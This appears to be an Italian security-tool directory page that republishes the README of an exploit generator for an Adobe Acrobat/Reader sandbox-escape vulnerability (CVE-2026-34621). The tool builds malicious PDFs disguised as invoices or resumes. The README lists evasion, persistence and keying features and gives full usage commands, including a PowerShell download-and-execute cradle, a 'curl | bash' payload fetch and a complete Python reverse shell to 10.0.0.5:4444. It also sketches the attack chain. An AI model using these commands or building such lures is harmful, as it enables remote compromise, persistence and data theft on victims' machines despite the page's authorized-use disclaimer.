Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve_2026_34621_advanced — Uno strumento sofisticato e multipiattaforma per la generazione di exploit per **CVE-2026-34621** – una vulnerabilità critica di prototype pollution in Adobe Acrobat e Reader che porta all'escape dalla sandbox e all'esecuzione di codice arbitrario su Windows e macOS. | Kitploit
Strumenti/GitHubGitHub/null200ok/cve_2026_34621_advanced
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Uno strumento sofisticato e multipiattaforma per la generazione di exploit per **CVE-2026-34621** – una vulnerabilità critica di prototype pollution in Adobe Acrobat e Reader che porta all'escape dalla sandbox e all'esecuzione di codice arbitrario su Windows e macOS.

Vedi Repository
136125 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Generatore Avanzato di Exploit per CVE-2026-34621

Python 3.7+ License

Un sofisticato generatore di exploit multipiattaforma per CVE-2026-34621 – una vulnerabilità critica di prototype pollution in Adobe Acrobat e Reader che porta all'escape dalla sandbox e all'esecuzione arbitraria di codice su Windows e macOS.

⚠️ DISCLAIMER IMPORTANTE
Questo strumento è destinato solo a ricerca sulla sicurezza autorizzata e test di penetrazione.
L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione scritta al test è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.


📋 Indice

  • Panoramica
  • Funzionalità
  • Installazione
  • Avvio Rapido
  • Esempi di Utilizzo
    • Comandi Windows
    • Comandi macOS
    • Test su Mobile
  • Opzioni della Riga di Comando
  • Come Funziona
  • Versioni Vulnerabili
  • Mitigazione
  • Contributi
  • Licenza

🔍 Panoramica

CVE-2026-34621 è una vulnerabilità zero-day in Adobe Acrobat e Reader che consente a un attaccante di:

  1. Inquinare il prototipo dell'oggetto JavaScript all'interno del motore di Adobe.
  2. Bypassare la sandbox di sicurezza.
  3. Eseguire comandi arbitrari di sistema sulla macchina della vittima.

Questo generatore crea un file PDF dannoso che, quando aperto in una versione vulnerabile di Adobe Reader, esegue automaticamente un payload adattato al sistema operativo della vittima.

Piattaforme Target Supportate:

  • ✅ Windows (esecuzione arbitraria di codice completa)
  • ✅ macOS (esecuzione arbitraria di codice completa)
  • ❌ Android / iOS (non vulnerabili – solo fallback dimostrativo)

✨ Funzionalità

CategoriaCapacità
Payload MultipiattaformaRileva automaticamente il sistema operativo e seleziona il metodo appropriato di esecuzione comandi per Windows o macOS.
Molteplici Vettori di Esecuzionecmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
Payload a StadiScarica ed esegue payload di secondo stadio da un URL remoto.
PersistenzaInstalla chiave di registro Run (Windows) o LaunchAgent (macOS).
Tecniche di EvasioneTre livelli di offuscamento JavaScript, keying ambientale, ritardi di esecuzione, codice polimorfico.
Incorporamento PDF EscaUnisce l'exploit in un PDF dall'aspetto legittimo (richiede PyPDF2).
Molteplici TriggerOpenAction, azione di apertura pagina o JavaScript a livello di documento.
Report CompletiReport HTML, TXT e JSON che dettagliano la configurazione del payload.

📦 Installazione

1. Clona il Repository

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (Opzionale) Crea un Ambiente Virtuale

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. Installa le Dipendenze

Lo script principale utilizza solo la libreria standard di Python. Per la funzionalità di unione PDF esca, installa PyPDF2:

pip install PyPDF2

🚀 Avvio Rapido

Genera un PDF di base che apre la calcolatrice sia su Windows che su macOS:

python3 cve_2026_34621_advanced.py -o test.pdf

Questo crea:

test.pdf – Il file PDF dannoso.

test_report.html – Report HTML dettagliato.

test_report.txt – Riepilogo in testo semplice.

test_config.json – Esportazione della configurazione JSON.

💻 Esempi di Utilizzo

Comandi Windows

1-Scenario Comando

A-Popup calc.exe di base

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

Reverse shell PowerShell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

Payload a stadi con persistenza

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

Keying ambientale (esegui solo su "SALES-PC")

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

Con livello di offuscamento 2 e ritardo di 10 secondi

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

Comandi macOS

2-Scenario Comando

Apri Calcolatrice

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

Scarica ed esegui script

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Reverse shell tramite Python

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

Persistenza tramite LaunchAgent

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

Incorporamento in un PDF Esca

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-Nota sui Test Mobile

Lo script stesso viene eseguito su desktop (Windows/macOS/Linux) per generare il PDF. Il PDF generato può essere aperto su dispositivi Android o iOS, ma:

Le versioni mobile di Adobe Acrobat Reader non sono vulnerabili a CVE-2026-34621.

Il payload attiverà un fallback dimostrativo benigno (apre un URL o mostra un avviso) invece di eseguire comandi di sistema.

📖 Opzioni della Riga di Comando

Opzione Descrizione

-o, --output FILE Obbligatoria. Nome del file PDF di output.

--win CMD Comando Windows da eseguire (predefinito: calc.exe).

--mac CMD Comando macOS da eseguire (predefinito: open /System/Applications/Calculator.app).

--stage URL URL da cui scaricare il payload di secondo stadio.

-p, --persistence Installa il meccanismo di persistenza (Registry/LanchAgent).

-O, --obfuscate LEVEL Livello di offuscamento JavaScript (0=nessuno, 1=base, 2=intermedio, 3=avanzato).

-d, --delay SECONDS Ritarda l'esecuzione del numero specificato di secondi.

-k, --key HOSTNAME Keying ambientale – esegui solo su hostname corrispondente.

-l, --lure PDF Percorso di un PDF legittimo da usare come esca (unisce l'exploit).

--trigger TYPE Vettore di trigger: openaction, pageopen o doclevel.

--no-reports Salta la generazione dei report HTML/TXT/JSON.

--seed N Imposta il seed casuale per la generazione polimorfica riproducibile.

⚙️ Come Funziona

Catena di Attacco

Prototype Pollution:

Il JavaScript incorporato modifica Object.prototype per iniettare proprietà dannose (__trusted, privileged, ecc.). Questo confonde il confine di fiducia del motore JavaScript di Adobe.

Escalation di Contesto

A causa del prototipo inquinato, il motore tratta erroneamente il JavaScript del documento non fidato come se fosse eseguito in un contesto privilegiato.

Accesso alle API Privilegiate

Lo script può ora chiamare API ristrette come app.launchURL, util.readFileIntoStream e app.trustedFunction.

Escape dalla Sandbox

Queste API consentono l'accesso al file system e l'esecuzione di processi al di fuori della sandbox di Adobe.

Esecuzione Arbitraria di Codice

Lo script esegue il comando dell'attaccante utilizzando metodi specifici del sistema operativo:

Windows: cmd.exe /c, PowerShell o WScript.Shell.

Scarica lo strumento